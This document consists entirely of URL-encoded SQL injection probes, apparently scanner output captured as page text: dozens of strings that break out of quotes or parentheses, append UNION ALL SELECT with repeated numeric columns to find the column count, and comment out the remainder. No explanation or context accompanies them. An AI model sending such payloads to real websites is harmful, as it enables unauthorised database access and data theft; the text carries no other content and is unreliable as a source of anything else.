-7669%27%29%20UNION%20ALL%20SELECT%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%2C%207144%23 -3895%27%29%20UNION%20ALL%20SELECT%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%2C%204794%23 -3723%27%29%20UNION%20ALL%20SELECT%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%2C%203022%23 -6213%27%20UNION%20ALL%20SELECT%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%2C%203711%23 -5852%27%20UNION%20ALL%20SELECT%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%23 -8880%27%20UNION%20ALL%20SELECT%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%23 -5649%27%20UNION%20ALL%20SELECT%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%2C%209424%23 -9825%27%20UNION%20ALL%20SELECT%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%2C%205529%23 -2143%27%20UNION%20ALL%20SELECT%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%2C%203525%23 -6510%27%20UNION%20ALL%20SELECT%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%2C%205050%23 -8592%27%20UNION%20ALL%20SELECT%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%2C%209493%23 -3461%27%20UNION%20ALL%20SELECT%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%2C%207947%23 -6504%27%20UNION%20ALL%20SELECT%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%2C%209684%23 -9541%22%20UNION%20ALL%20SELECT%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%2C%202975%23 -5407%22%20UNION%20ALL%20SELECT%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%23 -4178%22%20UNION%20ALL%20SELECT%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%2C%204232%23 -8882%22%20UNION%20ALL%20SELECT%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%2C%208159%23 -3536%22%20UNION%20ALL%20SELECT%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%2C%209221%23 -6866%22%20UNION%20ALL%20SELECT%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%23 -7631%22%20UNION%20ALL%20SELECT%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%2C%202125%23 -7324%22%20UNION%20ALL%20SELECT%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%2C%206993%23 -6138%22%20UNION%20ALL%20SELECT%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%2C%204287%23 -8938%22%20UNION%20ALL%20SELECT%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%2C%207493%23 -1913%29%20UNION%20ALL%20SELECT%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%2C%202634%23%20AND%20%288653%3D8653 -6716%29%20UNION%20ALL%20SELECT%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%2C%202544%23%20AND%20%282784%3D2784 -4462%29%20UNION%20ALL%20SELECT%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%2C%207661%23%20AND%20%281574%3D1574 -4811%29%20UNION%20ALL%20SELECT%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%2C%205800%23%20AND%20%282120%3D2120 -5697%29%20UNION%20ALL%20SELECT%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%2C%203204%23%20AND%20%289223%3D9223 -3843%29%20UNION%20ALL%20SELECT%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%2C%205090%23%20AND%20%285711%3D5711 -8900%29%20UNION%20ALL%20SELECT%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%2C%209175%23%20AND%20%287796%3D7796 -6081%29%20UNION%20ALL%20SELECT%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%2C%208652%23%20AND%20%288685%3D8685 -6797%29%20UNION%20ALL%20SELECT%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%2C%206485%23%20AND%20%289230%3D9230 -1348%29%20UNION%20ALL%20SELECT%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%23%20AND%20%284130%3D4130 -2266%29%29%20UNION%20ALL%20SELECT%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%2C%204931%23%20AND%20%28%285677%3D5677 -1317%29%29%20UNION%20ALL%20SELECT%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%2C%203025%23%20AND%20%28%289055%3D9055 -5151%29%29%20UNION%20ALL%20SELECT%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%23%20AND%20%28%289079%3D9079 -6229%29%29%20UNION%20ALL%20SELECT%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%2C%202953%23%20AND%20%28%285710%3D5710 -8112%29%29%20UNION%20ALL%20SELECT%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%2C%206025%23%20AND%20%28%283127%3D3127 -1393%29%29%20UNION%20ALL%20SELECT%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%23%20AND%20%28%281305%3D1305 -5116%29%29%20UNION%20ALL%20SELECT%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%2C%201341%23%20AND%20%28%287432%3D7432 -7654%29%29%20UNION%20ALL%20SELECT%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%23%20AND%20%28%283374%3D3374 -1282%29%29%20UNION%20ALL%20SELECT%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%23%20AND%20%28%282022%3D2022 -7128%29%29%20UNION%20ALL%20SELECT%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%2C%206275%23%20AND%20%28%283263%3D3263 -9097%29%29%29%20UNION%20ALL%20SELECT%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%2C%201153%23%20AND%20%28%28%284359%3D4359 -5457%29%29%29%20UNION%20ALL%20SELECT%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%2C%202405%23%20AND%20%28%28%288307%3D8307 -6659%29%29%29%20UNION%20ALL%20SELECT%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%2C%209625%23%20AND%20%28%28%289180%3D9180 -7525%29%29%29%20UNION%20ALL%20SELECT%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%2C%201633%23%20AND%20%28%28%287461%3D7461 -8778%29%29%29%20UNION%20ALL%20SELECT%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%2C%206412%23%20AND%20%28%28%289509%3D9509 -9188%29%29%29%20UNION%20ALL%20SELECT%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%2C%205998%23%20AND%20%28%28%284058%3D4058 